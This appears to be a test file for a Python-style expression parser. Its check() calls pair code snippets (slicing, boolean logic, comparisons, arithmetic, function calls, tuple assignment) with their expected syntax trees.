check('''a["hey",5]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5))),)))
check('''a[1:2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1::,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::1,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5))),)))
check('''a[1:2:,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:1:2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5))),)))
check('''a[1::2,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5))),)))
check('''a[1:2:3,5]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5))),)))
check('''a[1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5))),)))
check('''a["hey",5,]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5))),)))
check('''a[1:2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5))),)))
check('''a[1::,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5))),)))
check('''a[:1:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5))),)))
check('''a[::1,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5))),)))
check('''a[1:2:,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5))),)))
check('''a[:1:2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5))),)))
check('''a[1::2,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5))),)))
check('''a[1:2:3,5,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5))),)))
check('''a[1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a["hey","a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::1,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(1)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::2,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:3,"a":"b"]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(3)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a["hey","a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[::1,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(None), Const(1)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(None)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[:1:2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(None), Const(1), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1::2,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(None), Const(2)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1:2:3,"a":"b",]''', Suite((Call('return', Call('[.]', Name('a'), Call("slice", Const(1), Const(2), Const(3)), Call('slice', Const('a'), Const('b'), Const(None)))),)))
check('''a[1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5), Const(6))),)))
check('''a["hey",5,6]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5), Const(6))),)))
check('''a[1:2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1::,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::1,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5), Const(6))),)))
check('''a[1:2:,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:1:2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5), Const(6))),)))
check('''a[1::2,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5), Const(6))),)))
check('''a[1:2:3,5,6]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5), Const(6))),)))
check('''a[1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5), Const(6))),)))
check('''a["hey",5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'), Const(5), Const(6))),)))
check('''a[1:2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[1::,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)), Const(5), Const(6))),)))
check('''a[:1:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)), Const(5), Const(6))),)))
check('''a[::1,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)), Const(5), Const(6))),)))
check('''a[1:2:,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)), Const(5), Const(6))),)))
check('''a[:1:2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)), Const(5), Const(6))),)))
check('''a[1::2,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)), Const(5), Const(6))),)))
check('''a[1:2:3,5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)), Const(5), Const(6))),)))
check('''a[1:[2]:3,[],5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Call('list', Const(2)), Const(3)), Call('list'), Const(5), Const(6))),)))
check('''a[1:[[2]]:3,[[]],5,6,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Call('list', Call('list', Const(2))), Const(3)), Call('list', Call('list')), Const(5), Const(6))),)))
check('''a[2].three''', Suite((Call('return', Call('.', Call('[.]', Name('a'), Const(2)), 'three')),)))
check('''a.three''', Suite((Call('return', Call('.', Name('a'), 'three')),)))
check('''a[2]''', Suite((Call('return', Call('[.]', Name('a'), Const(2))),)))
check('''a.three[2]''', Suite((Call('return', Call('[.]', Call('.', Name('a'), 'three'), Const(2))),)))
check('''x and y''', Suite((Call('return', Call('and', Name('x'), Name('y'))),)))
check('''x and y and z''', Suite((Call('return', Call('and', Name('x'), Call('and', Name('y'), Name('z')))),)))
check('''x and y and z and w''', Suite((Call('return', Call('and', Name('x'), Call('and', Name('y'), Call('and', Name('z'), Name('w'))))),)))
check('''not x''', Suite((Call('return', Call('not', Name('x'))),)))
check('''not x and y''', Suite((Call('return', Call('and', Call('not', Name('x')), Name('y'))),)))
check('''x or y''', Suite((Call('return', Call('or', Name('x'), Name('y'))),)))
check('''x or y and z''', Suite((Call('return', Call('or', Name('x'), Call('and', Name('y'), Name('z')))),)))
check('''x or y or z''', Suite((Call('return', Call('or', Name('x'), Call('or', Name('y'), Name('z')))),)))
check('''not x or y and z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Name('y'), Name('z')))),)))
check('''x or not y and z''', Suite((Call('return', Call('or', Name('x'), Call('and', Call('not', Name('y')), Name('z')))),)))
check('''x or y and not z''', Suite((Call('return', Call('or', Name('x'), Call('and', Name('y'), Call('not', Name('z'))))),)))
check('''not x or not y and z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Call('not', Name('y')), Name('z')))),)))
check('''not x or y and not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Name('y'), Call('not', Name('z'))))),)))
check('''x or not y and not z''', Suite((Call('return', Call('or', Name('x'), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''not x or not y and not z''', Suite((Call('return', Call('or', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check('''x and y or z''', Suite((Call('return', Call('or', Call('and', Name('x'), Name('y')), Name('z'))),)))
check('''not x and y or z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Name('y')), Name('z'))),)))
check('''x and not y or z''', Suite((Call('return', Call('or', Call('and', Name('x'), Call('not', Name('y'))), Name('z'))),)))
check('''x and y or not z''', Suite((Call('return', Call('or', Call('and', Name('x'), Name('y')), Call('not', Name('z')))),)))
check('''not x and not y or z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Call('not', Name('y'))), Name('z'))),)))
check('''not x and y or not z''', Suite((Call('return', Call('or', Call('and', Call('not', Name('x')), Name('y')), Call('not', Name('z')))),)))
check('''x and not y or not z''', Suite((Call('return', Call('or', Call('and', Name('x'), Call('not', Name('y'))), Call('not', Name('z')))),)))
check('''x < y''', Suite((Call('return', Call('<', Name('x'), Name('y'))),)))
check('''x > y''', Suite((Call('return', Call('>', Name('x'), Name('y'))),)))
check('''x == y''', Suite((Call('return', Call('==', Name('x'), Name('y'))),)))
check('''x >= y''', Suite((Call('return', Call('>=', Name('x'), Name('y'))),)))
check('''x <= y''', Suite((Call('return', Call('<=', Name('x'), Name('y'))),)))
check('''x != y''', Suite((Call('return', Call('!=', Name('x'), Name('y'))),)))
check('''x in y''', Suite((Call('return', Call('in', Name('x'), Name('y'))),)))
check('''x not in y''', Suite((Call('return', Call('not-in', Name('x'), Name('y'))),)))
check('''1 < y < 2''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('<', Name('y'), Const(2)))),)))
check('''1 < y == 2''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('==', Name('y'), Const(2)))),)))
check('''(x, None) < y''', Suite((Call('return', Call('<', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) > y''', Suite((Call('return', Call('>', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) == y''', Suite((Call('return', Call('==', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) >= y''', Suite((Call('return', Call('>=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) <= y''', Suite((Call('return', Call('<=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) != y''', Suite((Call('return', Call('!=', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) in y''', Suite((Call('return', Call('in', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(x, None) not in y''', Suite((Call('return', Call('not-in', Call('tuple', Name('x'), Const(None)), Name('y'))),)))
check('''(1, None) < y < 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('<', Name('y'), Const(2)))),)))
check('''(1, None) < y == 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('==', Name('y'), Const(2)))),)))
check('''x < (y, None)''', Suite((Call('return', Call('<', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x > (y, None)''', Suite((Call('return', Call('>', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x == (y, None)''', Suite((Call('return', Call('==', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x >= (y, None)''', Suite((Call('return', Call('>=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x <= (y, None)''', Suite((Call('return', Call('<=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x != (y, None)''', Suite((Call('return', Call('!=', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x in (y, None)''', Suite((Call('return', Call('in', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''x not in (y, None)''', Suite((Call('return', Call('not-in', Name('x'), Call('tuple', Name('y'), Const(None)))),)))
check('''1 < (y, None) < 2''', Suite((Call('return', Call('and', Call('<', Const(1), Call('tuple', Name('y'), Const(None))), Call('<', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''1 < (y, None) == 2''', Suite((Call('return', Call('and', Call('<', Const(1), Call('tuple', Name('y'), Const(None))), Call('==', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''1 < y < (2, None)''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('<', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''1 < y == (2, None)''', Suite((Call('return', Call('and', Call('<', Const(1), Name('y')), Call('==', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''(x, None) < (y, None)''', Suite((Call('return', Call('<', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) > (y, None)''', Suite((Call('return', Call('>', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) == (y, None)''', Suite((Call('return', Call('==', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) >= (y, None)''', Suite((Call('return', Call('>=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) <= (y, None)''', Suite((Call('return', Call('<=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) != (y, None)''', Suite((Call('return', Call('!=', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) in (y, None)''', Suite((Call('return', Call('in', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(x, None) not in (y, None)''', Suite((Call('return', Call('not-in', Call('tuple', Name('x'), Const(None)), Call('tuple', Name('y'), Const(None)))),)))
check('''(1, None) < (y, None) < 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Call('tuple', Name('y'), Const(None))), Call('<', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''(1, None) < (y, None) == 2''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Call('tuple', Name('y'), Const(None))), Call('==', Call('tuple', Name('y'), Const(None)), Const(2)))),)))
check('''(1, None) < y < (2, None)''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('<', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''(1, None) < y == (2, None)''', Suite((Call('return', Call('and', Call('<', Call('tuple', Const(1), Const(None)), Name('y')), Call('==', Name('y'), Call('tuple', Const(2), Const(None))))),)))
check('''x + y''', Suite((Call('return', Call('+', Name('x'), Name('y'))),)))
check('''x + y + z''', Suite((Call('return', Call('+', Call('+', Name('x'), Name('y')), Name('z'))),)))
check('''x + y + z + w''', Suite((Call('return', Call('+', Call('+', Call('+', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x - y''', Suite((Call('return', Call('-', Name('x'), Name('y'))),)))
check('''x - y - z''', Suite((Call('return', Call('-', Call('-', Name('x'), Name('y')), Name('z'))),)))
check('''x - y - z - w''', Suite((Call('return', Call('-', Call('-', Call('-', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x - y + z - w''', Suite((Call('return', Call('-', Call('+', Call('-', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x * y''', Suite((Call('return', Call('*', Name('x'), Name('y'))),)))
check('''x * y * z''', Suite((Call('return', Call('*', Call('*', Name('x'), Name('y')), Name('z'))),)))
check('''x * y * z * w''', Suite((Call('return', Call('*', Call('*', Call('*', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x * y - z * w''', Suite((Call('return', Call('-', Call('*', Name('x'), Name('y')), Call('*', Name('z'), Name('w')))),)))
check('''x / y''', Suite((Call('return', Call('/', Name('x'), Name('y'))),)))
check('''x / y / z''', Suite((Call('return', Call('/', Call('/', Name('x'), Name('y')), Name('z'))),)))
check('''x / y / z / w''', Suite((Call('return', Call('/', Call('/', Call('/', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x / y * z / w''', Suite((Call('return', Call('/', Call('*', Call('/', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x % y''', Suite((Call('return', Call('%', Name('x'), Name('y'))),)))
check('''x % y % z''', Suite((Call('return', Call('%', Call('%', Name('x'), Name('y')), Name('z'))),)))
check('''x % y % z % w''', Suite((Call('return', Call('%', Call('%', Call('%', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x % y / z % w''', Suite((Call('return', Call('%', Call('/', Call('%', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x // y''', Suite((Call('return', Call('//', Name('x'), Name('y'))),)))
check('''x // y // z''', Suite((Call('return', Call('//', Call('//', Name('x'), Name('y')), Name('z'))),)))
check('''x // y // z // w''', Suite((Call('return', Call('//', Call('//', Call('//', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''x // y % z // w''', Suite((Call('return', Call('//', Call('%', Call('//', Name('x'), Name('y')), Name('z')), Name('w'))),)))
check('''+x''', Suite((Call('return', Call('u+', Name('x'))),)))
check('''-x''', Suite((Call('return', Call('u-', Name('x'))),)))
check('''++x''', Suite((Call('return', Call('u+', Call('u+', Name('x')))),)))
check('''+-x''', Suite((Call('return', Call('u+', Call('u-', Name('x')))),)))
check('''-+x''', Suite((Call('return', Call('u-', Call('u+', Name('x')))),)))
check('''--x''', Suite((Call('return', Call('u-', Call('u-', Name('x')))),)))
check('''+x + y''', Suite((Call('return', Call('+', Call('u+', Name('x')), Name('y'))),)))
check('''-x + y''', Suite((Call('return', Call('+', Call('u-', Name('x')), Name('y'))),)))
check('''++x + y''', Suite((Call('return', Call('+', Call('u+', Call('u+', Name('x'))), Name('y'))),)))
check('''+-x + y''', Suite((Call('return', Call('+', Call('u+', Call('u-', Name('x'))), Name('y'))),)))
check('''-+x + y''', Suite((Call('return', Call('+', Call('u-', Call('u+', Name('x'))), Name('y'))),)))
check('''--x + y''', Suite((Call('return', Call('+', Call('u-', Call('u-', Name('x'))), Name('y'))),)))
check('''x + +x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Name('x')))),)))
check('''x + -x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Name('x')))),)))
check('''x + ++x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Call('u+', Name('x'))))),)))
check('''x + +-x''', Suite((Call('return', Call('+', Name('x'), Call('u+', Call('u-', Name('x'))))),)))
check('''x + -+x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Call('u+', Name('x'))))),)))
check('''x + --x''', Suite((Call('return', Call('+', Name('x'), Call('u-', Call('u-', Name('x'))))),)))
check('''x ** y''', Suite((Call('return', Call('**', Name('x'), Name('y'))),)))
check('''x ** y ** z''', Suite((Call('return', Call('**', Name('x'), Call('**', Name('y'), Name('z')))),)))
check('''x ** y ** z ** w''', Suite((Call('return', Call('**', Name('x'), Call('**', Name('y'), Call('**', Name('z'), Name('w'))))),)))
check('''x ** y // z ** w''', Suite((Call('return', Call('//', Call('**', Name('x'), Name('y')), Call('**', Name('z'), Name('w')))),)))
check('''x.y**2''', Suite((Call('return', Call('**', Call('.', Name('x'), 'y'), Const(2))),)))
check('f(None)', Suite((Call('return', Call(Name('f'), Const(None))),)))
check('f(x, None)', Suite((Call('return', Call(Name('f'), Name('x'), Const(None))),)))
check('f(x, y, None)', Suite((Call('return', Call(Name('f'), Name('x'), Name('y'), Const(None))),)))
check('f(x, y, z, None)', Suite((Call('return', Call(Name('f'), Name('x'), Name('y'), Name('z'), Const(None))),)))
check('f(x=1)', Suite((Call('return', CallKeyword(Name('f'), (), (('x', Const(1)),))),)))
check('f(x, y=1)', Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('y', Const(1)),))),)))
check('f(x, y, z=1)', Suite((Call('return', CallKeyword(Name('f'), (Name('x'), Name('y'),), (('z', Const(1)),))),)))
check('x = 1; x', Suite((Assign((Name('x'),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x = 1; x;', Suite((Assign((Name('x'),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, = 1; x', Suite((Assign((Unpack((Name('x'),)),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, z = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'), Name('z'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check('x, y, z, = 1; x', Suite((Assign((Unpack((Name('x'), Name('y'), Name('z'))),), Const(1)), Name('x'), Call('return', Const(None)),)))
check("False", Suite((Call('return', Const(False)),)))
check("True", Suite((Call('return', Const(True)),)))
check("not x", Suite((Call('return', Call('not', Name('x'))),)))
check("not x and not y", Suite((Call('return', Call('and', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x and not y and not z", Suite((Call('return', Call('and', Call('not', Name('x')), Call('and', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y", Suite((Call('return', Call('or', Call('not', Name('x')), Call('not', Name('y')))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("not x or not y or not z", Suite((Call('return', Call('or', Call('not', Name('x')), Call('or', Call('not', Name('y')), Call('not', Name('z'))))),)))
check("(not x or not y, None) and not z", Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Name('x')), Call('not', Name('y'))), Const(None)), Call('not', Name('z')))),)))
check("not x and (not y or not z, None)", Suite((Call('return', Call('and', Call('not', Name('x')), Call('tuple', Call('or', Call('not', Name('y')), Call('not', Name('z'))), Const(None)))),)))
check("not x(1, None)", Suite((Call('return', Call('not', Call(Name('x'), Const(1), Const(None)))),)))
check("not x(1, None) and not y(2, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('not', Call(Name('y'), Const(2), Const(None))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
check("not x(1, None) and not y(2, None) and not z(3, None)", Suite((Call('return', Call('and', Call('not', Call(Name('x'), Const(1), Const(None))), Call('and', Call('not', Call(Name('y'), Const(2), Const(None))), Call('not', Call(Name('z'), Const(3), Const(None)))))),)))
